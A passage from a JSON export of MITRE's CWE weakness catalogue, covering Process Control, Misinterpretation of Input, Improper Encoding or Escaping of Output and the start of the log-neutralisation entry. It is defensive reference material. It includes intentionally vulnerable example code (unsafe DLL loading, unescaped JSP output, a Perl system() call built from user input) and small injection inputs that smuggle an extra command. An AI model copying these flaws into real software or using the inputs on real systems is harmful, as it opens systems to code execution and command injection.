Splitting\')","attr":{"@_Date":"2010-06-21"}}]}},"114":{"attr":{"@_ID":"114","@_Name":"Process Control","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Executing commands or loading libraries from an untrusted source or in an untrusted environment can cause an application to execute malicious commands (and payloads) on behalf of an attacker.","Extended_Description":"Process control vulnerabilities take two forms: 1. An attacker can change the command that the program executes: the attacker explicitly controls what the command is. 2. An attacker can change the environment in which the command executes: the attacker implicitly controls what the command means. Process control vulnerabilities of the first type occur when either data enters the application from an untrusted source and the data is used as part of a string representing a command that is executed by the application. By executing the command, the application gives an attacker a privilege or capability that the attacker would not otherwise have.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"73","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":"Libraries that are loaded should be well understood and come from a trusted source. The application can execute code contained in the native libraries, which often contain calls that are susceptible to other security problems, such as buffer overflows or command injection. All native libraries should be validated to determine if the application requires the use of the library. It is very difficult to determine what these native libraries actually do, and the potential for malicious code is high. In addition, the potential for an inadvertent mistake in these native libraries is also high, as many are written in C or C++ and may be susceptible to buffer overflow or race condition problems. To help prevent buffer overflow attacks, validate all input to native calls for content and length. If the native library does not come from a trusted source, review the source code of the library. The library should be built from the reviewed source before using it."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"The following code uses System.loadLibrary() to load code from a native library named library.dll, which is normally found in a standard system directory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...System.loadLibrary(\\"library.dll\\");...","xhtml:br":["",""]}},"Body_Text":"The problem here is that System.loadLibrary() accepts a library name, not a path, for the library to be loaded. From the Java 1.4.2 API documentation this function behaves as follows [1]: A file containing native code is loaded from the local file system from a place where library files are conventionally obtained. The details of this process are implementation-dependent. The mapping from a library name to a specific filename is done in a system-specific manner. If an attacker is able to place a malicious copy of library.dll higher in the search order than file the application intends to load, then the application will load the malicious copy instead of the intended file. Because of the nature of the application, it runs with elevated privileges, which means the contents of the attacker\'s library.dll will now be run with elevated privileges, possibly giving them complete control of the system."},{"Intro_Text":"The following code from a privileged application uses a registry entry to determine the directory in which it is installed and loads a library file based on a relative path from the specified directory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"...RegQueryValueEx(hkey, \\"APPHOME\\",0, 0, (BYTE*)home, &amp;size);char* lib=(char*)malloc(strlen(home)+strlen(INITLIB));if (lib) {}...","xhtml:br":["","","","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"strcpy(lib,home);strcat(lib,INITCMD);LoadLibrary(lib);","xhtml:br":["","",""]}}}},"Body_Text":"The code in this example allows an attacker to load an arbitrary library, from which code will be executed with the elevated privilege of the application, by modifying a registry key to specify a different path containing a malicious version of INITLIB. Because the program does not validate the value read from the environment, if an attacker can control the value of APPHOME, they can fool the application into running malicious code."},{"Intro_Text":"The following code is from a web-based administration utility that allows users access to an interface through which they can update their profile on the system. The utility makes use of a library named liberty.dll, which is normally found in a standard system directory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":"LoadLibrary(\\"liberty.dll\\");"},"Body_Text":"The problem is that the program does not specify an absolute path for liberty.dll. If an attacker is able to place a malicious library named liberty.dll higher in the search order than file the application intends to load, then the application will load the malicious copy instead of the intended file. Because of the nature of the application, it runs with elevated privileges, which means the contents of the attacker\'s liberty.dll will now be run with elevated privileges, possibly giving the attacker complete control of the system. The type of attack seen in this example is made possible because of the search order used by LoadLibrary() when an absolute path is not specified. If the current directory is searched before system directories, as was the case up until the most recent versions of Windows, then this type of attack becomes trivial if the attacker can execute the program locally. The search order is operating system version dependent, and is controlled on newer operating systems by the value of the registry key: HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Session Manager\\\\SafeDllSearchMode"}]},"Affected_Resources":{"Affected_Resource":"System Process"},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Process Control"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"108"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-6"}}},"Notes":{"Note":{"#text":"CWE-114 is a Class, but it is listed a child of CWE-73 in view 1000. This suggests some abstraction problems that should be resolved in future versions.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes"}]}},"115":{"attr":{"@_ID":"115","@_Name":"Misinterpretation of Input","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software misinterprets an input, whether from an attacker or another product, in a security-relevant fashion.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"436","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2005-2225","Description":"Product sees dangerous file extension in free text of a group discussion, disconnects all users.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2225"},{"Reference":"CVE-2001-0003","Description":"Product does not correctly import and process security settings from another product.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0003"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Misinterpretation Error"}},"Notes":{"Note":{"#text":"This concept needs further study. It is likely a factor in several weaknesses, possibly resultant as well. Overlaps Multiple Interpretation Errors (MIE).","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Time_of_Introduction"}],"Previous_Entry_Name":{"#text":"Misinterpretation Error","attr":{"@_Date":"2008-04-11"}}}},"116":{"attr":{"@_ID":"116","@_Name":"Improper Encoding or Escaping of Output","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software prepares a structured message for communication with another component, but encoding or escaping of the data is either missing or done incorrectly. As a result, the intended structure of the message is not preserved.","Extended_Description":{"xhtml:p":["Improper encoding or escaping can allow attackers to change the commands that are sent to another component, inserting malicious commands instead.","Most software follows a certain protocol that uses structured messages for communication between components, such as queries or commands. These structured messages can contain raw data interspersed with metadata or control information. For example, \\"GET /index.html HTTP/1.1\\" is a structured message containing a command (\\"GET\\") with a single argument (\\"/index.html\\") and metadata about which protocol version is being used (\\"HTTP/1.1\\").","If an application uses attacker-supplied inputs to construct a structured message without properly encoding or escaping, then the attacker could insert special characters that will cause the data to be interpreted as control information or metadata. Consequently, the component that receives the output will perform the wrong operations, or otherwise interpret the data incorrectly."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"707","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"74","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Often"}},"Technology":[{"attr":{"@_Name":"Database Server","@_Prevalence":"Often"}},{"attr":{"@_Name":"Web Server","@_Prevalence":"Often"}}]},"Alternate_Terms":{"Alternate_Term":[{"Term":"Output Sanitization"},{"Term":"Output Validation"},{"Term":"Output Encoding"}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Integrity","Impact":"Modify Application Data","Note":"The communications between components can be modified in unexpected ways. Unexpected commands can be executed, bypassing other security mechanisms. Incoming data can be misinterpreted."},{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":"Execute Unauthorized Code or Commands","Note":"The communications between components can be modified in unexpected ways. Unexpected commands can be executed, bypassing other security mechanisms. Incoming data can be misinterpreted."},{"Scope":"Confidentiality","Impact":"Bypass Protection Mechanism","Note":"The communications between components can be modified in unexpected ways. Unexpected commands can be executed, bypassing other security mechanisms. Incoming data can be misinterpreted."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":"This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Effectiveness":"Moderate","Effectiveness_Notes":"This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-4.3"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, consider using the ESAPI Encoding control [REF-45] or a similar tool, library, or framework. These will help the programmer encode outputs in a manner less prone to error.","Alternately, use built-in functions, but consider using wrappers in case those functions are discovered to have a vulnerability."]}},{"attr":{"@_Mitigation_ID":"MIT-27"},"Phase":"Architecture and Design","Strategy":"Parameterization","Description":{"xhtml:p":["If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.","For example, stored procedures can enforce database query structure and reduce the likelihood of SQL injection."]}},{"Phase":["Architecture and Design","Implementation"],"Description":"Understand the context in which your data will be used and the encoding that will be expected. This is especially important when transmitting data between different components, or when generating outputs that can contain multiple encodings at the same time, such as web pages or multi-part mail messages. Study all expected communication protocols and data representations to determine the required encoding strategies."},{"Phase":"Architecture and Design","Description":"In some cases, input validation may be an important strategy when output encoding is not a complete solution. For example, you may be providing the same output that will be processed by multiple consumers that use different encodings or representations. In other cases, you may be required to allow user-supplied input to contain control information, such as limited HTML tags that support formatting in a wiki or bulletin board. When this type of requirement must be met, use an extremely strict allowlist to limit which control sequences can be used. Verify that the resulting syntactic structure is what you expect. Use your normal encoding methods for the remainder of the input."},{"Phase":"Architecture and Design","Description":"Use input validation as a defense-in-depth measure to reduce the likelihood of output encoding errors (see CWE-20)."},{"Phase":"Requirements","Description":"Fully specify which encodings are required by components that will be communicating with each other."},{"Phase":"Implementation","Description":"When exchanging data between components, ensure that both components are using the same character encoding. Ensure that the proper encoding is applied at each interface. Explicitly set the encoding you are using whenever the protocol allows you to do so."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This code displays an email address that was submitted as part of a form.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"JSP"},"xhtml:div":{"#text":"&lt;% String email = request.getParameter(\\"email\\"); %&gt;...Email Address: &lt;%= email %&gt;","xhtml:br":["",""]}},"Body_Text":"The value read from the form parameter is reflected back to the client browser without having been encoded prior to output, allowing various XSS attacks (CWE-79)."},{"Intro_Text":"Consider a chat application in which a front-end web application communicates with a back-end server. The back-end is legacy code that does not perform authentication or authorization, so the front-end must implement it. The chat protocol supports two commands, SAY and BAN, although only administrators can use the BAN command. Each argument must be separated by a single space. The raw inputs are URL-encoded. The messaging protocol allows multiple commands to be specified on the same line if they are separated by a \\"|\\" character.","Body_Text":["First let\'s look at the back end command processor code","The front end web application receives a command, encodes it for sending to the server, performs the authorization check, and sends the command to the server.","It is clear that, while the protocol and back-end allow multiple commands to be sent in a single request, the front end only intends to send a single command. However, the UrlEncode function could leave the \\"|\\" character intact. If an attacker provides:","then the front end will see this is a \\"SAY\\" command, and the $argstr will look like \\"hello world | BAN user12\\". Since the command is \\"SAY\\", the check for the \\"BAN\\" command will fail, and the front end will send the URL-encoded command to the back end:","The back end, however, will treat these as two separate commands:","Notice, however, that if the front end properly encodes the \\"|\\" with \\"%7C\\", then the back end will only process a single command."],"Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$inputString = readLineFromFileHandle($serverFH);@commands = split(/\\\\|/, $inputString);foreach $cmd (@commands) {}","xhtml:br":["","","","",""],"xhtml:i":"# generate an array of strings separated by the \\"|\\" character.","xhtml:div":{"#text":"($operator, $args) = split(/ /, $cmd, 2);$args = UrlDecode($args);if ($operator eq \\"BAN\\") {}elsif ($operator eq \\"SAY\\") {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""],"xhtml:i":"# separate the operator from its arguments based on a single whitespace","xhtml:div":[{"#text":"ExecuteBan($args);","attr":{"@_style":"margin-left:10px;"}},{"#text":"ExecuteSay($args);","attr":{"@_style":"margin-left:10px;"}}]}}},{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$inputString = GetUntrustedArgument(\\"command\\");($cmd, $argstr) = split(/\\\\s+/, $inputString, 2);$argstr =~ s/\\\\s+/ /gs;$argstr = UrlEncode($argstr);if (($cmd eq \\"BAN\\") &amp;&amp; (! IsAdministrator($username))) {}$fh = GetServerFileHandle(\\"myserver\\");print $fh \\"$cmd $argstr\\\\n\\";","xhtml:br":["","","","","","","","","","","",""],"xhtml:i":["# removes extra whitespace and also changes CRLF\'s to spaces","# communicate with file server using a file handle"],"xhtml:div":{"#text":"die \\"Error: you are not the admin.\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"attack"},"xhtml:div":"SAY hello world|BAN user12"},{"attr":{"@_Nature":"result"},"xhtml:div":"SAY hello%20world|BAN%20user12"},{"attr":{"@_Nature":"result"},"xhtml:div":{"#text":"SAY hello worldBAN user12","xhtml:br":""}}]},{"Intro_Text":"This example takes user input, passes it through an encoding scheme and then creates a directory specified by the user.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"sub GetUntrustedInput {}sub encode {}sub doit {}","xhtml:div":[{"#text":"return($ARGV[0]);","attr":{"@_style":"margin-left:10px;"}},{"#text":"my($str) = @_;$str =~ s/\\\\&amp;/\\\\&amp;amp;/gs;$str =~ s/\\\\\\"/\\\\&amp;quot;/gs;$str =~ s/\\\\\'/\\\\&amp;apos;/gs;$str =~ s/\\\\&lt;/\\\\&amp;lt;/gs;$str =~ s/\\\\&gt;/\\\\&amp;gt;/gs;return($str);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""]},{"#text":"my $uname = encode(GetUntrustedInput(\\"username\\"));print \\"&lt;b&gt;Welcome, $uname!&lt;/b&gt;&lt;p&gt;\\\\n\\";system(\\"cd /home/$uname; /bin/ls -l\\");","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""]}],"xhtml:br":["","","",""]}},{"attr":{"@_Nature":"attack"},"xhtml:div":"\' pwd"}],"Body_Text":["The programmer attempts to encode dangerous characters, however the denylist for encoding is incomplete (CWE-184) and an attacker can still pass a semicolon, resulting in a chain with command injection (CWE-77).","Additionally, the encoding routine is used inappropriately with command execution. An attacker doesn\'t even need to insert their own semicolon. The attacker can instead leverage the encoding routine to provide the semicolon to separate the commands. If an attacker supplies a string of the form:","then the program will encode the apostrophe and insert the semicolon, which functions as a command separator when passed to the system function. This allows the attacker to complete the command injection."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-4636","Description":"OS command injection in backup software using shell metacharacters in a filename; correct behavior would require that this filename could not be changed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4636"},{"Reference":"CVE-2008-0769","Description":"Web application does not set the charset when sending a page to a browser, allowing for XSS exploitation when a browser chooses an unexpected encoding.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0769"},{"Reference":"CVE-2008-0005","Description":"Program does not set the charset when sending a page to a browser, allowing for XSS exploitation when a browser chooses an unexpected encoding.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0005"},{"Reference":"CVE-2008-5573","Description":"SQL injection via password parameter; a strong password might contain \\"&amp;\\"","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5573"},{"Reference":"CVE-2008-3773","Description":"Cross-site scripting in chat application via a message subject, which normally might contain \\"&amp;\\" and other XSS-related characters.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3773"},{"Reference":"CVE-2008-0757","Description":"Cross-site scripting in chat application via a message, which normally might be allowed to contain arbitrary content.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0757"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":22,"Entry_Name":"Improper Output Handling"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS00-J","Entry_Name":"Sanitize untrusted data passed across a trust boundary","Mapping_Fit":"Exact"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"IDS05-J","Entry_Name":"Use a subset of ASCII for file and path names"},{"attr":{"@_Taxonomy_Name":"SEI CERT Oracle Coding Standard for Java"},"Entry_ID":"IDS00-J","Entry_Name":"Prevent SQL injection","Mapping_Fit":"Imprecise"},{"attr":{"@_Taxonomy_Name":"SEI CERT Perl Coding Standard"},"Entry_ID":"IDS33-PL","Entry_Name":"Sanitize untrusted data passed across a trust boundary","Mapping_Fit":"Exact"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"104"}},{"attr":{"@_CAPEC_ID":"73"}},{"attr":{"@_CAPEC_ID":"81"}},{"attr":{"@_CAPEC_ID":"85"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-45"}},{"attr":{"@_External_Reference_ID":"REF-46"}},{"attr":{"@_External_Reference_ID":"REF-47"}},{"attr":{"@_External_Reference_ID":"REF-48"}},{"attr":{"@_External_Reference_ID":"REF-49"}},{"attr":{"@_External_Reference_ID":"REF-50"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 11, &#34;Canonical Representation Issues&#34; Page 363"}}]},"Notes":{"Note":[{"#text":"This weakness is primary to all weaknesses related to injection (CWE-74) since the inherent nature of injection involves the violation of structured messages.","attr":{"@_Type":"Relationship"}},{"attr":{"@_Type":"Relationship"},"xhtml:p":["CWE-116 and CWE-20 have a close association because, depending on the nature of the structured message, proper input validation can indirectly prevent special characters from changing the meaning of a structured message. For example, by validating that a numeric ID field should only contain the 0-9 characters, the programmer effectively prevents injection attacks.","However, input validation is not always sufficient, especially when less stringent data types must be supported, such as free-form text. Consider a SQL injection scenario in which a last name is inserted into a query. The name \\"O\'Reilly\\" would likely pass the validation step since it is a common last name in the English language. However, it cannot be directly inserted into the database because it contains the \\"\'\\" apostrophe character, which would need to be escaped or otherwise neutralized. In this case, stripping the apostrophe might reduce the risk of SQL injection, but it would produce incorrect behavior because the wrong name would be recorded."]},{"#text":"The usage of the \\"encoding\\" and \\"escaping\\" terms varies widely. For example, in some programming languages, the terms are used interchangeably, while other languages provide APIs that use both terms for different tasks. This overlapping usage extends to the Web, such as the \\"escape\\" JavaScript function whose purpose is stated to be encoding. The concepts of encoding and escaping predate the Web by decades. Given such a context, it is difficult for CWE to adopt a consistent vocabulary that will not be misinterpreted by some constituency.","attr":{"@_Type":"Terminology"}},{"#text":"This is a data/directive boundary error in which data boundaries are not sufficiently enforced before it is sent to a different control sphere.","attr":{"@_Type":"Theoretical"}},{"#text":"While many published vulnerabilities are related to insufficient output encoding, there is such an emphasis on input validation as a protection mechanism that the underlying causes are rarely described. Within CVE, the focus is primarily on well-understood issues like cross-site scripting and SQL injection. It is likely that this weakness frequently occurs in custom protocols that support multiple encodings, which are not necessarily detectable with automated techniques.","attr":{"@_Type":"Research Gap"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Alternate_Terms, Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Name, Observed_Examples, Potential_Mitigations, References, Relationship_Notes, Relationships, Research_Gaps, Terminology_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Detection_Factors, Potential_Mitigations, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationship_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Likelihood_of_Exploit, References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships, Terminology_Notes"}],"Previous_Entry_Name":[{"#text":"Output Validation","attr":{"@_Date":"2008-04-11"}},{"#text":"Incorrect Output Sanitization","attr":{"@_Date":"2008-09-09"}},{"#text":"Insufficient Output Sanitization","attr":{"@_Date":"2009-01-12"}}]}},"117":{"attr":{"@_ID":"117","@_Name":"Improper Output Neutralization for Logs","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not neutralize or incorrectly neutralizes output that is written to logs.","Extended_Description":{"xhtml:p":["This can allow an attacker to forge log entries or inject malicious content into logs.","Log forging vulnerabilities occur when:"],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["Data enters an application from an untrusted source.","The data is written to an application or system log file."]}}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"116","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"20","@_View_ID":"700","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Background_Details":{"Background_Detail":"Applications typically use log files to store a history of events or transactions for later review, statistics gathering, or debugging. Depending on the nature of the application, the task of reviewing log files may be performed 